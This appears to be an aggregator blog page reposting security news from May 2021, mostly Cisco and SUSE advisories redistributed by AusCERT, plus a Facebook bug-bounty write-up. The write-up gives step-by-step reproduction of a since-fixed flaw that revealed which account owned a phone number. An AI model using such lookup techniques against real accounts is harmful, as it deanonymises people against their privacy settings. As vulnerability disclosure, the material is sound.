Malware Devil

Thursday, May 6, 2021

Identify a Facebook user by his phone number despite privacy settings set

Description

This bug could allow an attacker to identify if a phone number is linked to a Facebook user account and if so what’s the id of the user. While adding a phone number in m.facebook.com to the attacker Facebook account, the endpoint m.facebook.com/phoneacquire/ would return the current owner of the phone number despite the privacy settings set by the owner.

Reproduction Steps

1) From the attacker account, go to https://m.facebook.com/ntdelegatescreen/?params={“saved”:true}&path=/contacts/management/
2) Add a new new phone number that you need to look up if it’s linked to a Facebook account
3) A redirect to https://m.facebook.com/phoneacqwrite/ endpoint should be done. In the attached parameters, there’s a parameter called giver_id which would be the user id of the Facebook user who has this phone number added to his account.

Impact

This could have been misused to deanonymize/identify a Facebook user account linked to given phone number.

Timeline

Mar 13, 2021– Report Sent
Mar 17, 2021– Acknowledged by Facebook
Apr 7, 2021– Fixed by Facebook
Apr 26, 2021 — $9K bounty awarded by Facebook (Including bonus)

The post Identify a Facebook user by his phone number despite privacy settings set appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/identify-a-facebook-user-by-his-phone-number-despite-privacy-settings-set/?utm_source=rss&utm_medium=rss&utm_campaign=identify-a-facebook-user-by-his-phone-number-despite-privacy-settings-set

Quais são os tipos mais comuns de ciberataques?

Para que possamos nos proteger, precisamos entender como a ameaça funciona e de onde ela vem. Ciberameaças são tentativas maliciosas feitas a uma organização ou indivíduo para obter dados sensíveis e utilizá-los para benefício próprio.

Esses criminosos usam uma variedade …

The post Quais são os tipos mais comuns de ciberataques? appeared first on ManageEngine Blog.

The post Quais são os tipos mais comuns de ciberataques? appeared first on Security Boulevard.

The post Quais são os tipos mais comuns de ciberataques? appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/quais-sao-os-tipos-mais-comuns-de-ciberataques/?utm_source=rss&utm_medium=rss&utm_campaign=quais-sao-os-tipos-mais-comuns-de-ciberataques

DevOps Connect at RSAC 2021: Insightful Talks, Live Q&A, Workshops, Pilates and More

We are excited to announce the return of DevOps Connect: DevSecOps Virtual Summit on May 19, as part of the RSA Conference 2021. This year, internationally recognized speakers will take a deep dive into “Securing the Cloud Native World.” DevOps Connect is a full-day event, featuring four different content tracks, with more than 50 speakers,..

The post DevOps Connect at RSAC 2021: Insightful Talks, Live Q&A, Workshops, Pilates and More appeared first on Security Boulevard.

The post DevOps Connect at RSAC 2021: Insightful Talks, Live Q&A, Workshops, Pilates and More appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/devops-connect-at-rsac-2021-insightful-talks-live-qa-workshops-pilates-and-more/?utm_source=rss&utm_medium=rss&utm_campaign=devops-connect-at-rsac-2021-insightful-talks-live-qa-workshops-pilates-and-more

ESB-2021.1548 – [Win] Cisco Webex Meetings Desktop App: Access privileged data – Existing account

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1548
Cisco Webex Meetings Desktop App for Windows Shared Memory
Information Disclosure Vulnerability
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: Cisco Webex Meetings Desktop App
Publisher: Cisco Systems
Operating System: Windows
Impact/Access: Access Privileged Data — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2020-3347

Reference: ESB-2020.2116.4

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

– ————————–BEGIN INCLUDED TEXT——————–

Cisco Webex Meetings Desktop App for Windows Shared Memory Information
Disclosure Vulnerability

Priority: Medium
Advisory ID: cisco-sa-webex-client-NBmqM9vt
First Published: 2020 June 17 16:00 GMT
Last Updated: 2021 May 5 15:31 GMT
Version 1.5: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvt99384 CSCvu05505
CVE Names: CVE-2020-3347
CWEs: CWE-200

CVSS Score:
5.5 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X

Summary

o A vulnerability in Cisco Webex Meetings Desktop App for Windows could allow
an authenticated, local attacker to gain access to sensitive information on
an affected system.

The vulnerability is due to unsafe usage of shared memory that is used by
the affected software. An attacker with permissions to view system memory
could exploit this vulnerability by running an application on the local
system that is designed to read shared memory. A successful exploit could
allow the attacker to retrieve sensitive information from the shared
memory, including usernames, meeting information, or authentication tokens
that could aid the attacker in future attacks.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

Affected Products

o Vulnerable Products

At the time of publication, this vulnerability affected Cisco Webex
Meetings Desktop App for Windows releases earlier than 41.2.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.

Details

o Cisco Webex Meetings Desktop App uses shared memory to exchange information
with the Windows operating system and other applications. The software may
store sensitive information-such as usernames, meeting information, and
authentication tokens-in this shared memory space. Other users on the local
system could retrieve this information from within the shared memory space
and use it for additional attacks.

Workarounds

o There are no workarounds that address this vulnerability.

Fixed Software

o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories and Alerts page , to determine exposure and a
complete upgrade solution.

In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.

Fixed Releases

At the time of publication, the following releases contained the fix for
this vulnerability:

Cisco Webex Product Fixed Release
Cisco Webex Meetings Desktop App for 41.2 and later
Windows
Cisco Webex Meetings Desktop App for 39.5.26 and later
Windows, lockdown versions
3.0 MR3 Security Patch 3 and
Cisco Webex Meetings Server later
4.0 MR3 Security Patch 2 and
later

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Exploitation and Public Announcements

o The Cisco Product Security Incident Response Team (PSIRT) is aware that
proof-of-concept exploit code is available for the vulnerability that is
described in this advisory.

The Cisco PSIRT is not aware of any malicious use of the vulnerability that
is described in this advisory.

Source

o Cisco would like to thank Martin Rakhmanov of Trustwave for reporting this
vulnerability.

Cisco Security Vulnerability Policy

o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

Revision History

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYJNLGeNLKJtyKPYoAQgKGRAAi212V/PT/yGzIZTGWuiq7IdsQ0Je+gXw
EbC3VVJnbWGZ/nQFNfJjLa/Uxr6GbEmjBJtucqd159ir824BJRvDN65AGJSxS0Sj
VQw9jSgqzcOuBQ9jp7Al6hYd40RbsSr3gok1w+EDznVDnpdl8g3aHtD1na6Ab071
v87qnQnlFne8k7MPPi2SvM/jsGoOyqfbViLkquhB4kXqeOrGcYV+9Dcirxx50L1I
EsDOHvmx0ECQ5Rd0b7kIo4Etmopwp6Ce3LQFbCFSrT9Hasb+Rf5Tge1EpVM5jxQ2
nSQenux6eO0pW3BwoS9TiQicfghkHNarVtw0mkPa68Mhj/qu54q97qATNcnCNoLu
Pave7blRUUMt5ZvkCgs7+jZRBhQP0hHe6VRFyPBEQFzn6L8C36oW3r1yE7e3e5EJ
XHYvJCwLiUS2cjElEmlbRqihxGr3B9LR4m15ANWxkpQndx5a6e22TeMvIwK6Ycka
Ke4d2r54uRmZ9SjjtArJhyWnxBeNvt1pMzGh4JlO6KS5jmNLPuv80mc1RSHx1C3v
h0DFwx0jrH9B/53xnB45v/7ttQUp2vcmMUqsU7GITiYyt5cjely4g+RDoAFYAPXz
O0gCrRYb/3vz4RqNpJ7hdpaLuNKsUHOn34Cv4mjihBZZ7981/g4JbUwPk3X28HcS
1N4jNNCXfdE=
=lBIx
—–END PGP SIGNATURE—–

The post ESB-2021.1548 – [Win] Cisco Webex Meetings Desktop App: Access privileged data – Existing account appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/esb-2021-1548-win-cisco-webex-meetings-desktop-app-access-privileged-data-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1548-win-cisco-webex-meetings-desktop-app-access-privileged-data-existing-account

ESB-2021.1549 – [Cisco] Cisco Wide Area Application Services (WAAS): Access confidential data – Existing account

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1549
Cisco Wide Area Application Services Software Information
Disclosure Vulnerability
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: Cisco Wide Area Application Services (WAAS)
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Access Confidential Data — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1438

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-waas-infdisc-Twb4EypK

– ————————–BEGIN INCLUDED TEXT——————–

Cisco Wide Area Application Services Software Information Disclosure
Vulnerability

Priority: Medium
Advisory ID: cisco-sa-waas-infdisc-Twb4EypK
First Published: 2021 May 5 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvw97364
CVE Names: CVE-2021-1438
CWEs: CWE-668

Summary

o A vulnerability in Cisco Wide Area Application Services (WAAS) Software
could allow an authenticated, local attacker to gain access to sensitive
information on an affected device.

The vulnerability is due to improper input validation and authorization of
specific commands that a user can execute within the CLI. An attacker could
exploit this vulnerability by authenticating to an affected device and
issuing a specific set of commands. A successful exploit could allow the
attacker to read arbitrary files that they originally did not have
permissions to access.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-waas-infdisc-Twb4EypK

Affected Products

o Vulnerable Products

This vulnerability affects Cisco Wide Area Application Services releases
6.4.5a and earlier.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.

Workarounds

o There are no workarounds that address this vulnerability.

Fixed Software

o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.

Fixed Releases

Cisco Wide Area Application Services releases 6.4.5c and later contain the
fix for this vulnerability.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Exploitation and Public Announcements

o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.

Source

o This vulnerability was found during internal security testing.

Cisco Security Vulnerability Policy

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-waas-infdisc-Twb4EypK

Revision History

o +———-+—————————+———-+——–+————–+
| Version | Description | Section | Status | Date |
+———-+—————————+———-+——–+————–+
| 1.0 | Initial public release. | – | Final | 2021-MAY-05 |
+———-+—————————+———-+——–+————–+

– ————————–END INCLUDED TEXT——————–

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

iQIVAwUBYJNOruNLKJtyKPYoAQjrPA//YvBFRmJULjg5I4bG2ocHRaOxsXdtHZnF
VXINTl/KgZj8MwuTWMoCBzjAj3pNI7/cmMKJXoG8Roqy7dHW3fEguV9X2EkjOiRs
aHNBOB8GmjmFlzqgafhaHcQWS3lXCOqt48VL1irkdADjH7XNLPMMWQI0L/a7Ycs1
tnsQz1TvambcFuTtTAj3p7EnBi+XMtoKgNbkZEN48YbxlSvTy9My7ssI3UNJ9ld7
RNw7o41Qnzup3Fn0a2hhn54UVmaTb0p+JwCXiPYyp+r8zXROCcVdF0icH8zSnrQz
wQESxTp5xac4MxOs6DUaVjsFfGW3MohSMajHJOKsETHFb3m/vkESu707uQWe7V7l
bQF9Nu6Oacvk/dmGns7bR+cGLsZRBp9BuNa35Desxy6SkNtkm20EjsZkc6fbjsx5
AzIiyaHVLGA1/iuiEnrU0QFzprdC3qGyVDfWGKkfjy7yMlVVE1q+4xt0Bi60ibXf
4PT72RTw2rJqQT0p3Ob1L+o3v+rQvfQ/zVFIPcBEbKgQjE5dlzwO4sezwaiv+2Dk
zZRiKjdOi3iFUWXJMGoUTVs7n244AYBAWYF9MWXESAoSiAYZtDVKRV4t8kEVRTcQ
fQLelogr16qJKJWY7//xngvfd4QYtzIH3VkMuWEVX5aRbM3lvZyCR1DvXsuAOYAR
fKgfTesi4wM=
=GTbX
—–END PGP SIGNATURE—–

The post ESB-2021.1549 – [Cisco] Cisco Wide Area Application Services (WAAS): Access confidential data – Existing account appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/esb-2021-1549-cisco-cisco-wide-area-application-services-waas-access-confidential-data-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1549-cisco-cisco-wide-area-application-services-waas-access-confidential-data-existing-account

ESB-2021.1550 – [Mac] Cisco AnyConnect Secure Mobility Client: Root compromise – Existing account

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1550
MacOS Local Privilege Escalation Exploitable through Cisco
AnyConnect Secure Mobility Client
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: Cisco AnyConnect Secure Mobility Client
Publisher: Cisco Systems
Operating System: Mac OS
Impact/Access: Root Compromise — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2020-9817

Reference: ESB-2020.1859

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-mac-priv-esc-VqST2nrT

– ————————–BEGIN INCLUDED TEXT——————–

MacOS Local Privilege Escalation Exploitable through Cisco AnyConnect Secure
Mobility Client

Priority: Informational
Advisory ID: cisco-sa-anyconnect-mac-priv-esc-VqST2nrT
First Published: 2021 May 5 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available

Summary

o On May 26, 2020, Apple released a security update for MacOS Catalina,
Mojave, and High Sierra. Part of this update addressed a local privilege
escalation vulnerability (CVE-2020-9817).

Cisco has determined that Cisco AnyConnect Secure Mobility Client releases
4.10.00093 and earlier could be used to exploit this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-mac-priv-esc-VqST2nrT

Details

o The MacOS Installer process extracts the contents of an application package
to a temporary folder before execution. Instead of assigning ownership of
these files to the root user, the original UID from the developer’s system
is maintained. A local attacker with the same UID as the extracted files
could modify them to execute code on the underlying operating system with
root privileges.

Additional information about this vulnerability is available at the
following links:

About the security content of macOS Catalina 10.15.5, Security Update
2020-003 Mojave, Security Update 2020-003 High Sierra
Technical Advisory – macOS Installer Local Root Privilege Escalation
(CVE-2020-9817)

Recommendations

o Cisco customers are advised to apply the Apple security update on all
affected operating systems where Cisco applications or products are
running.

Cisco will update Cisco AnyConnect Secure Mobility Client in the next
release to address this MacOS Installer vulnerability.

Source

o Cisco would like to thank the Lockheed Martin Red Team for reporting this
vulnerability.

Cisco Security Vulnerability Policy

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-mac-priv-esc-VqST2nrT

Revision History

– ————————–END INCLUDED TEXT——————–

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

iQIVAwUBYJNOuuNLKJtyKPYoAQhY9RAAjCVupWZZJMS+d6hdVo9Qg/bZ1fUhRu+9
LP5h/VJ/yJ/Pwphjgyd9sWBcMnqeZGUujOKs81/YLUIDt3V0pazL0k8s3py+Ampo
kZDpdUU3uioLvaS/DC/Uh7hAHDpgV8YvcpBFUNrw0Crj1T/NGzOxcOvz2sa3DIdO
bNQ0DS6URwoqnnsZLDJjXj/t/rhKn2kzsY+dcvkDkeLwQzsYk69ifEb0FsK0/3aI
nuERx+XkMBm+ug/+XGjVVnzCP6xc1ZoDht29eeB9qdMA0OqUIPzHcadRZYc+uNAj
P4wA3WS7ie6zv1F+voUV6PhnsVa6jzmfmPBz6XyZGgZX4gTeEHpNe+xfvf3FFUEt
tBUzWjag9yS6ojI/uth1v4ZTIJ+3havp+KpE4L2YPBY0LA7zfm7GgUI1ShUK+GEC
GvHOpsbEC1KVAK4ea9h6eOaxpLylYvU+4wcUrh+HITBrUeRRYXYjdS4UWPKb0DaO
1L2n2TSydc0wwCWGnrHwLYaStw9MiczrZPAdDlMOJ8roaj53PV9cmRwRUAuO/U+P
OPcnY+1cz4WhbmSXpLE3o0TNB0TYWCle1qy7Z08DtyhE6V7Z9vZa83m0Ii7hHsqL
pznrhRcGJCbWDy+ji4H9NtVU1LPVglfBIfuSyks36sByXxh891gt5ifFzO5GFsB+
krKzZUnW6lo=
=qJp3
—–END PGP SIGNATURE—–

The post ESB-2021.1550 – [Mac] Cisco AnyConnect Secure Mobility Client: Root compromise – Existing account appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/esb-2021-1550-mac-cisco-anyconnect-secure-mobility-client-root-compromise-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1550-mac-cisco-anyconnect-secure-mobility-client-root-compromise-existing-account

ESB-2021.1551 – [Cisco] Cisco Content Security Management Appliance (SMA): Root compromise – Existing account

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1551
CiscoÂ Content Security Management Appliance Privilege
Escalation Vulnerability
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: Cisco Content Security Management Appliance (SMA)
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Root Compromise — Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1447

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-priv-esc-JJ8zxQsC

– ————————–BEGIN INCLUDED TEXT——————–

Cisco Content Security Management Appliance Privilege Escalation Vulnerability

Priority: Medium
Advisory ID: cisco-sa-sma-priv-esc-JJ8zxQsC
First Published: 2021 May 5 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvx14681
CVE Names: CVE-2021-1447
CWEs: CWE-269

Summary

o A vulnerability in the user account management system of Cisco AsyncOS for
Cisco Content Security Management Appliance (SMA) could allow an
authenticated, local attacker to elevate their privileges to root .

This vulnerability is due to a procedural flaw in the password generation
algorithm. An attacker could exploit this vulnerability by enabling
specific Administrator -only features and connecting to the appliance
through the CLI with elevated privileges. A successful exploit could allow
the attacker to execute arbitrary commands as root and access the
underlying operating system. To exploit this vulnerability, the attacker
must have valid Administrator credentials.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-priv-esc-JJ8zxQsC

Affected Products

o Vulnerable Products

At the time of publication, this vulnerability affected Cisco SMA, both
physical and virtual, releases earlier than Release 12.8.1-002 and Release
13.8.1-068.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.

Cisco has confirmed that this vulnerability does not affect the following
Cisco products:

Web Security Appliance (WSA), both physical and virtual
Email Security Appliance (ESA), both physical and virtual

Workarounds

o There are no workarounds that address this vulnerability.

Fixed Software

Fixed Releases

At the time of publication, Cisco SMA releases 12.8.1-002 and later and
13.8.1-068 and later contained the fix for this vulnerability.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Exploitation and Public Announcements

o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.

Source

o This vulnerability was found by Jakub Bros of Cisco during internal
security testing.

Cisco Security Vulnerability Policy

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-priv-esc-JJ8zxQsC

Revision History

– ————————–END INCLUDED TEXT——————–

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

iQIVAwUBYJNPRONLKJtyKPYoAQhnoA//WFEf7ZzrMJcSJDijlgzxbA0e2FVSLxNa
MkhIX+6usIrev698djcN9S5LIp+9l3FrfbjAsC2qSsXy4TQZx6l9dXnLYWgoRlVW
PSv7DaVpvdc6nvp6+afLMzUMrPDjkkbn5KILMpFJ6tt3jLngGxC/jSA5CP1vGcCN
ALclNlVu84Fc/pSAdGBAAomtQ1RE6JUwf7RwOjb8rDB1Y4/UDGbFXGYk4qSFl5pY
gKpPW5OANXqajizda30eogryQVIoUwAQwiTI2GsazySQmJRsHlzwx7oUt/VbeUcb
XP7CP1s4W+MgZsdU1W8rJOsOa0AzTwAmYxQ3ntZpU6d05E38yunJVc+l2fBDQgyR
HjbMxJSlHZ4ZrrcP2sj/2GTiS1qQWIGUk9wKhnUbn3iaYISwtTx7lHcXIlLuAWnr
aQ+zseLs4pf6WalN8IcXs+0nq+KOOuzFEaOb6d3dQgsC4qw/zycuEIPDfvOl8lbS
0FqKvhDK4n9gXXtXOmLBBf38QyBJPmkKSkH3VOi/E6EIyKr2SxTF0Dsi84UHUXqB
5AIYHJxaxgz4VH0UphonyKExBW1LRal/E8XYr+U7a3k1VjHtSDbC4q3uazUc2oEX
rw+bf4tnNxwmgf9Az+TjIvZdZVvIuQ9XNpDS0+l8tuWeuLdw+8BSXL0xo44qGq/8
fLmlB9m33x8=
=/MHW
—–END PGP SIGNATURE—–

The post ESB-2021.1551 – [Cisco] Cisco Content Security Management Appliance (SMA): Root compromise – Existing account appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/esb-2021-1551-cisco-cisco-content-security-management-appliance-sma-root-compromise-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1551-cisco-cisco-content-security-management-appliance-sma-root-compromise-existing-account

ESB-2021.1552 – [SUSE] openexr: Denial of service – Remote/unauthenticated

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1552
Security update for openexr
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
———————————

Product: openexr
Publisher: SUSE
Operating System: SUSE
Impact/Access: Denial of Service — Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-26260 CVE-2021-23215 CVE-2021-20296
CVE-2021-3479 CVE-2021-3477

Reference: ESB-2021.1132

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211489-1

– ————————–BEGIN INCLUDED TEXT——————–

SUSE Security Update: Security update for openexr

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1489-1
Rating: important
References: #1184353 #1184354 #1184355 #1185216 #1185217
Cross-References: CVE-2021-20296 CVE-2021-23215 CVE-2021-26260 CVE-2021-3477
CVE-2021-3479
Affected Products:
SUSE Linux Enterprise Module for Desktop Applications 15-SP3
SUSE Linux Enterprise Module for Desktop Applications 15-SP2
______________________________________________________________________________

An update that fixes 5 vulnerabilities is now available.

Description:

This update for openexr fixes the following issues:

o CVE-2021-23215: Fixed an integer-overflow in
Imf_2_5:DwaCompressor:initializeBuffers (bsc#1185216).
o CVE-2021-26260: Fixed an Integer-overflow in
Imf_2_5:DwaCompressor:initializeBuffers (bsc#1185217).
o CVE-2021-20296: Fixed a Null Pointer dereference in Imf_2_5:hufUncompress
(bsc#1184355).
o CVE-2021-3477: Fixed a Heap-buffer-overflow in
Imf_2_5::DeepTiledInputFile::readPixelSampleCounts (bsc#1184353).
o CVE-2021-3479: Fixed an Out-of-memory caused by allocation of a very large
buffer (bsc#1184354).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Module for Desktop Applications 15-SP3:
zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP3-2021-1489=1
o SUSE Linux Enterprise Module for Desktop Applications 15-SP2:
zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP2-2021-1489=1

Package List:

o SUSE Linux Enterprise Module for Desktop Applications 15-SP3 (aarch64
ppc64le s390x x86_64):
libIlmImf-2_2-23-2.2.1-3.27.1
libIlmImf-2_2-23-debuginfo-2.2.1-3.27.1
libIlmImfUtil-2_2-23-2.2.1-3.27.1
libIlmImfUtil-2_2-23-debuginfo-2.2.1-3.27.1
openexr-debuginfo-2.2.1-3.27.1
openexr-debugsource-2.2.1-3.27.1
openexr-devel-2.2.1-3.27.1
o SUSE Linux Enterprise Module for Desktop Applications 15-SP2 (aarch64
ppc64le s390x x86_64):
libIlmImf-2_2-23-2.2.1-3.27.1
libIlmImf-2_2-23-debuginfo-2.2.1-3.27.1
libIlmImfUtil-2_2-23-2.2.1-3.27.1
libIlmImfUtil-2_2-23-debuginfo-2.2.1-3.27.1
openexr-debuginfo-2.2.1-3.27.1
openexr-debugsource-2.2.1-3.27.1
openexr-devel-2.2.1-3.27.1

References:

o https://www.suse.com/security/cve/CVE-2021-20296.html
o https://www.suse.com/security/cve/CVE-2021-23215.html
o https://www.suse.com/security/cve/CVE-2021-26260.html
o https://www.suse.com/security/cve/CVE-2021-3477.html
o https://www.suse.com/security/cve/CVE-2021-3479.html
o https://bugzilla.suse.com/1184353
o https://bugzilla.suse.com/1184354
o https://bugzilla.suse.com/1184355
o https://bugzilla.suse.com/1185216
o https://bugzilla.suse.com/1185217

– ————————–END INCLUDED TEXT——————–

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

iQIVAwUBYJNdBeNLKJtyKPYoAQjx0A//Xqx44dBFs52uLh9eEz44fR/hHqAhV3Ic
MHIRvgGoFRpEgRBiRjLwNKYaI0KMatgK2tCQoslGw5ZViUYb8MyF1noSSibS/2ee
VF00Ds2VhgsePvTHY21MeoP5CzFzJ0+C8GCRMfkDSP+o8befkJ+5rwGOF2tbtqgO
4cH6Wy8kZKqintT1m4JgAuNUveRRBmxTWTQMi/G+yZrcUKJyYdZAvyyvfemStTGi
GDf/WXX5l0rc/lv8IC6mUmVziwMk6/uMZFTXit50ymnwFpsEfqFtdR/KI0cZSzQR
wATX/2TKOh8QI667vZllRJSjZSm+y5Kbt7g8FX/Dc/m2jUq1tiE2xnHQedcSN2jB
l3rnNOCd8/kgooeDGnT02J4FuLO65Arp7diWpY1E7V04+9L+m1LCRMOOKMYlynQE
pSUpzEALMo5VemYpXAe4sRe1kZDnDaZX0UMOQYuaIyjSYVf/sqEQf2+XBpLiylBe
4vaO8AZegdh/HwhAyr8JeqHZorurqXIp96SI4AJ3pgk8nFQ8ahOWM7HPJb0i0dox
9xNYHYJqp+Sk0FUCoarRuCzijWjPknGouEylbOlAoZAWBWvvvk8C3QRrc2Fc43L6
VKuzax9Ic9C3aAreOfaWyCPDVPO/JEJT2N6VFm7rvcPyRrokClRKGG6Nw6fTNZoC
553jIcqAo34=
=fKed
—–END PGP SIGNATURE—–

The post ESB-2021.1552 – [SUSE] openexr: Denial of service – Remote/unauthenticated appeared first on Malware Devil.

https://malwaredevil.com/2021/05/06/esb-2021-1552-suse-openexr-denial-of-service-remote-unauthenticated/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1552-suse-openexr-denial-of-service-remote-unauthenticated

ESB-2021.1553 – [UNIX/Linux][SUSE] p7zip: Denial of service – Existing account

—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1553
Security update for p7zip
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
